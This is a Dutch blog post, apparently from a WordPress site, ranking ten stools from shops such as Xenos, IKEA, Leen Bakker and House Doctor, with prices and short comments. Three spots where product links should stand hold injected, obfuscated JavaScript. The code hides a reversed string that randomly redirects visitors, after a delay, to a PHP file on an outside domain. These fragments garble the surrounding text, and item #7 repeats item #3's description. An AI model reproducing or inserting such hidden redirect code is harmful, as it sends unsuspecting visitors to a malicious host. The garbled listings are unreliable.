Krukjes top 10 van Viving!

Je ziet ze tegenwoordig in allerlei kleuren en maten; krukjes. Het leuke is dat krukjes voor heel veel dingen gebruikt kunnen worden. Je kan er niet alleen op zitten, maar je kunt ze ook als bijzettafel of salontafel gebruiken. Deze multifunctionele woontrend is dus eigenlijk heel praktisch, vrolijk en staat bijna in elk huis. Speciaal voor jullie selecteerde ik mijn top 10. Ik ben erg benieuwd welke jullie het leukst vinden.

Krukje canvas bruin Xenos

#1. Krukje Canvas, Xenos € 19,99

Dit stoere bruine krukje is gemaakt van canvas en heeft een lederlook band door het midden lopen.

vtwonen bijzettafel

#2. Bloq, vtwonen € 69,-

De Bloq van vtwonen is een massieve witte boomstam. De bovenzijde is gelakt en hierdoor ziet dit er chique, maar ook stoer uit.

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doctor-kruk-hout-blank-31cm-h48cm/19069320/”]

#3. Kruk Blank, Housedoctor € 119,-

Deze kruk vind ik er erg naturel uitzien en is gemaakt van onbehandeld gemixt hout. Het leuke is dat hierdoor elke kruk uniek, en dat is origineel!

INGOLF Kruk IKEA

#4. Houten Kruk, IKEA € 29,95

Dit krukje van IKEA is simpel, maar erg stijlvol. Het houten kruis aan de zijkant geeft het net even een leuk detail.

Kruk Owen naturel Leen Bakker

#5. Kruk Owen, Leen Bakker € 34,99

Dit houten basis krukje heeft een ouderwetse look en ziet er hierdoor heel rijk uit. Niet te veel poespas, gewoon mooi en elegant.

Krukje zadelzit Levi naturel Leen Bakker

#6. Zadelzit Kruk, Leen Bakker € 69,99

Alleen de vorm vind ik al echt fantastisch en dit zit ook nog eens een keer erg lekker.

Bronze Stoolen by Uhuru Design Product

#7. Kruk Architonic

Deze kruk vind ik er erg naturel uitzien en is gemaakt van onbehandeld gemixt hout. Het leuke is dat hierdoor elke kruk uniek, en dat is origineel!

O5 Krukje Pall LOODS5

#8. O5 Krukje, Loods5 € 95,-

Dit krukje is de ideale mix tussen industrieel en chic, een tijdloze aanwinst voor je interieur. De materialen staal en hout maken dit krukje erg stoer!

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doctor-stoel-woddy.html”]

#9. Krukje, De Interieur Collectie € 79,-

Dit houten krukje is zo mooi gemaakt. Het hout komt prachtig tot zijn recht en door de verschillende delen ziet dit krukje er speels uit.

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doctor-krukje-kawa.html?gclid=CjwKEAjw-IOwBRD1wrTC27fSjFISJABUDZ174FOREQajNSRY1gNNk8_rNFBikg5E7-V7jAs3Cybm2BoC0Fbw_wcB”]

#10. Krukje, House Doctor € 169,-

Prachtige materialen en vormen in dit design krukje van HouseDoctor. Een echte eye-catcher in je huis!

Geen Reacties op "Krukjes top 10 van Viving!"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.